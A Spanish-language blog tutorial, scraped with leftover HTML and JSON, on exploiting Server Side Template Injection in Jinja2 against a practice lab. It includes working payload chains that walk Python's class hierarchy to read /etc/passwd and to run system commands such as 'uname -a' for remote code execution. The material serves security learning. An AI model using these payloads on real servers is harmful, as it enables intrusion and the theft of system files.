![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_01.png\")
<\/figure><\/div>\n\n\nLas vulnerabilidades de SSTI<\/strong> (Server Side Template Injection<\/em>) o como reza el t\u00edtulo en espa\u00f1ol ‘Inyecci\u00f3n de plantillas del lado del Servidor<\/strong>‘ es una de esas vulnerabilidades que m\u00e1s entretenidas se hacen de explotar y dado su alcance (en muchos casos<\/em>), nos conducir\u00e1 a obtener un RCE<\/strong> (Remote Code Execution<\/em>), lo que lo convierte en algo serio. Para resumirlo r\u00e1pidamente, SSTI<\/strong> es una vulnerabilidad que aprovecha una implementaci\u00f3n insegura de un motor de plantillas (template engine<\/em>). Los motores de plantilla son empleado por las aplicaciones web para la presentaci\u00f3n de datos din\u00e1micos. Para poder ver todo esto m\u00e1s claro, vamos a ir con un ejemplo pr\u00e1ctico. Para ello vamos a emplear el laboratorio de Sam Bown<\/a><\/strong>.<\/p>\n\n\n <\/p>\n\n\n\n A trav\u00e9s de una primera comprobaci\u00f3n revisaremos la entrada de usuario \u00abSearch Users here\u2026<\/em>\u00ab<\/p>\n\n\n <\/p>\n\n\n\n Para mayor comodidad en las comprobaciones y revisar las peticiones enviadas y respuestas del servidor, nos pondremos con el Repeater<\/em> de BurpSuite<\/strong>.<\/p>\n\n\n\n Como parte de la metodolog\u00eda de actuaci\u00f3n en estos casos, vamos a tomar en cuenta el siguiente diagrama (prestado de la gente de PortSwigger<\/em>), que nos permitir\u00e1 identificar el motor de plantilla empleado por esta aplicaci\u00f3n web.<\/p>\n\n\n <\/p>\n\n\n\n Por tanto, trasladaremos estas comprobaciones a nuestro objetivo para identificar el motor de plantilla.<\/p>\n\n\n <\/p>\n\n\n <\/p>\n\n\n <\/p>\n\n\n\n Despu\u00e9s de esta breve comprobaci\u00f3n tendremos resuelta la primera necesidad: conocer el motor de plantilla empleado por la aplicaci\u00f3n web, que en este caso se trata de Jinja2<\/strong>.<\/p>\n\n\n\n Ser\u00e1 muy importante tener en cuenta la documentaci\u00f3n de este motor de plantilla: https:\/\/jinja.palletsprojects.com\/en\/2.11.x\/<\/a>. Adem\u00e1s de tomar en cuenta que este motor de plantilla tiene como base Python<\/strong>, lo que ser\u00e1 muy relevante a la hora de llamar a recursos de este lenguaje cuando pretendamos preparar una acci\u00f3n en el servidor destino, como por ejemplo: ejecutar comandos del sistema<\/em>.<\/p>\n\n\n\n Si bien sabemos que una de las formas m\u00e1s b\u00e1sicas de ejecutar comandos del sistema en Python<\/strong> es a trav\u00e9s de la siguiente manera:<\/p>\n\n\n\n Debemos tomar en cuenta que Jinja2<\/strong> cuenta con algunas limitaciones, como la imposibilidad de declarar de forma directa import<\/em>, por tanto esto anterior no nos ser\u00e1 v\u00e1lido. Vamos ha realizarlo a trav\u00e9s de una variante: revisando las clases de un objeto. Para esto emplearemos una cadena vac\u00eda que ir\u00e1 entre comillas simples, de la siguiente forma:<\/p>\n\n\n\n <\/p>\n\n\n\n Tomemos en cuenta que a nivel web esto se ver\u00eda as\u00ed:<\/p>\n\n\n <\/p>\n\n\n\n Sin embargo en adelante, nos centraremos en la vista que ofrece BurpSuite<\/strong>.<\/p>\n\n\n\n Ahora valiendonos del atributo <\/p>\n\n\n\n Por ahora nos centraremos en el tipo Object<\/em>. Es decir en el tercer elemento mostrado, por tanto escribimos el n\u00famero 2<\/strong>. Se debe tomar en cuenta que en Python<\/strong> se empieza a contar desde el 0.<\/p>\n\n\n\n <\/p>\n\n\n\n Ya estando en la cima de la jerarqu\u00eda es momento de revisar las subclases, para ello nos valdremos de <\/p>\n\n\n\n Como he comentado, el listado es amplio, ahora lo suyo es revisarlos todos. A trav\u00e9s del Intruder<\/em> de BurpSuite<\/strong> har\u00e9 un recorrido por todas las subclases mostradas. <\/p>\n\n\n\n En la posici\u00f3n 40 se observa un tipo de m\u00e9todo interesante:<\/p>\n\n\n <\/p>\n\n\n\n Emplearemos este m\u00e9todo (file<\/strong>) para leer los archivos del sistema:<\/p>\n\n\n\n <\/p>\n\n\n\n Otro elemento que resulta interesante de considerar es el ‘catch_warnings<\/em>‘, este elemento (gestor de contexto<\/em>) nos permitir\u00e1 identificar cuando la ejecuci\u00f3n de un determinado comando en el sistema se ha ejecutado de forma correcta o si por lo contrario ha arrojado alg\u00fan tipo de error.<\/p>\n\n\n\n <\/p>\n\n\n\n Llegados a este punto nos valdremos del m\u00f3dulo ‘builtins<\/em>‘ que nos permitir\u00e1 tomar acceso a todos los identificadores \u00abintegrados<\/em>\u00bb de Python<\/strong>. Por tanto conformaremos la siguiente sentencia:<\/p>\n\n\n\n <\/p>\n\n\n\n Esto nos devolver\u00e1 el resultado esperado en caso de ser 0, si no fuese as\u00ed, ser\u00e1 indicativo que algo no ha resultado correcto en la operaci\u00f3n.<\/p>\n\n\n\n Bien, ahora llega el momento de exfiltrar esta informaci\u00f3n y para ello enviaremos el resultado del comando ejecutado a alg\u00fan fichero temporal y posteriormente lo leeremos de la forma que ya hemos comentado l\u00edneas m\u00e1s arriba.<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n A nivel web esta ser\u00e1 la presentaci\u00f3n:<\/p>\n\n\n <\/p>\n\n\n\n Y bien, como he dicho al inicio, la cosa se pone entretenida en este punto, lo que se pueda hacer estar\u00e1 sujeto netamente a la creatividad de quien aproveche esta vulnerabilidad. Espero que os entre el gusanillo por indagar m\u00e1s sobre estas t\u00e9cnicas y variantes. Conmigo ser\u00e1 hasta la pr\u00f3xima entrada.<\/p>\n\n\n\n Las vulnerabilidades de SSTI (Server Side Template Injection) o como reza el t\u00edtulo en espa\u00f1ol ‘Inyecci\u00f3n de plantillas del lado del Servidor’ es una de esas vulnerabilidades que m\u00e1s entretenidas se hacen de explotar y dado su alcance (en muchos casos), nos conducir\u00e1 a obtener un RCE (Remote Code Execution), lo que lo convierte en algo serio.<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[12,1],"tags":[],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/posts\/803"}],"collection":[{"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/comments?post=803"}],"version-history":[{"count":17,"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/posts\/803\/revisions"}],"predecessor-version":[{"id":2617,"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/posts\/803\/revisions\/2617"}],"wp:attachment":[{"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/media?parent=803"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/categories?post=803"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infayer.com\/wp-json\/wp\/v2\/tags?post=803"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
Bien, pues empezaremos introduciendo un poco el concepto y describiendo el vector m\u00e1s b\u00e1sico de detecci\u00f3n de esta vulnerabilidad. Para ello y antes de nada, no debo olvidar referenciar los siguientes enlaces en donde se detallan ampliamente de lo que trata esta vulnerabilidad:<\/p>\n\n\n\n\n
Por lo general, a menudo muchas inserciones de los usuarios que son posteriormente reflejadas en la respuesta de la aplicaci\u00f3n web son interpretadas como vulnerabilidades de Cross-Site Scripting<\/strong> (XSS<\/em>), sin embargo a trav\u00e9s del aprovechamiento de esta vulnerabilidad es posible atacar directamente a los componentes internos del servidor web del objetivo.
Algunos motores de plantilla populares son los siguientes:<\/p>\n\n\n\n\n
Detecci\u00f3n<\/h2>\n\n\n\n
![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_02.png\")
<\/figure><\/div>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_03.png\")
<\/figure><\/div>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_04.png\")
<\/figure><\/div>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_05.png\")
<\/figure><\/div>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_06.png\")
<\/figure><\/div>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_07.png\")
<\/figure><\/div>\n\n\nExplotaci\u00f3n<\/h2>\n\n\n\n
import os\nos.system('id')<\/pre>\n\n\n\n{{ ''.__class__ }}<\/pre>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_08.png\")
<\/figure><\/div>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_09.png\")
<\/figure><\/div>\n\n\n.__mro__<\/strong><\/code> revisaremos las posibilidades de saltar (escalar<\/em>) por el \u00e1rbol de objetos.<\/p>\n\n\n\n{{ ''.__class__.__mro__ }}<\/pre>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_10.png\")
<\/figure><\/div>\n\n\n.__mro__<\/strong><\/code> que viene de Method Resolution Order<\/em>, nos devuelve una lista de tipos de los que se deriva la jerarqu\u00eda de clase, en el orden en que se buscan los m\u00e9todos.<\/p>\n\n\n\n{{ ''.__class__.__mro__[2] }}<\/pre>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_11.png\")
<\/figure><\/div>\n\n\n.__subclasses__()<\/strong><\/code>. Aqu\u00ed obtendremos toda la herencia de los atributos y m\u00e9todos de una clase. Lo que viene siendo un \u00ablistadito guapo<\/em>\u00ab.<\/p>\n\n\n\n{{ ''.__class__.__mro__[2].__subclasses__() }}<\/pre>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_12.png\")
<\/figure><\/div>\n\n\n
A continuaci\u00f3n un \u00abtruco<\/em>\u00bb que suelo emplear para dejarlo algo m\u00e1s manejable:<\/p>\n\n\n\n\n
{{ ''.__class__.__mro__[2].__subclasses__()[X] }}<\/code>
En donde X ser\u00e1 una posici\u00f3n num\u00e9rica de la subclase.<\/p>\n<\/blockquote>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_13.png\")
<\/figure><\/div>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_14.png\")
<\/figure><\/div>\n\n\n{{ ''.__class__.__mro__[2].__subclasses__()[40]('\/etc\/passwd').read() }}<\/pre>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_15.png\")
<\/figure><\/div>\n\n\n{{ ''.__class__.__mro__[2].__subclasses__()[59] }}<\/pre>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_16.png\")
<\/figure><\/div>\n\n\n{% set loquesea = ''.__class__.__mro__[2].__subclasses__()[59] %}{{ loquesea()._module.__builtins__['__import__']('os').system(\"uname -a\") }}<\/pre>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_17.png\")
<\/figure><\/div>\n\n\n{% set loquesea = ''.__class__.__mro__[2].__subclasses__()[59] %}{{ loquesea()._module.__builtins__['__import__']('os').system(\"uname -a > \/tmp\/result.txt\") }}{{ ''.__class__.__mro__[2].__subclasses__()[40]('\/tmp\/result.txt').read() }}<\/pre>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_18.png\")
<\/figure><\/div>\n\n\n![\"\"](\"https:\/\/infayer.com\/wp-content\/uploads\/2021\/07\/ent_20210716_19.png\")
<\/figure><\/div>\n\n\nReferencias:<\/h2>\n\n\n\n
\n